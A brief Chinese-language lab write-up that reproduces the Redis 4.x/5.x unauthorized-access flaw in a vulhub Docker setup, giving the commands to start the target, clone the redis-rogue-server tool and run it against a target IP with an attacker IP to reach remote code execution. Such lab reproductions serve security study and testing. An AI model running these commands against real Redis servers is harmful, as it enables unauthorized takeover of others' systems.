Redis 4.x/5.x 未授权访问漏洞复现

0x01环境搭建

cd /vulhub/redis/4-unacc
docker-compose up -d

6379端口打开

0x02漏洞复现

使用redis-rogue-server工具。使用该工具将在终端伪造一个redis服务并尝试与目标连接实现未授权访问

git clone https://github.com/n0b0dyCN/redis-rogue-server

连接

python3 ./redis-rogue-server.py --rhost 靶机ip --lhost 攻击机ip

RCE成功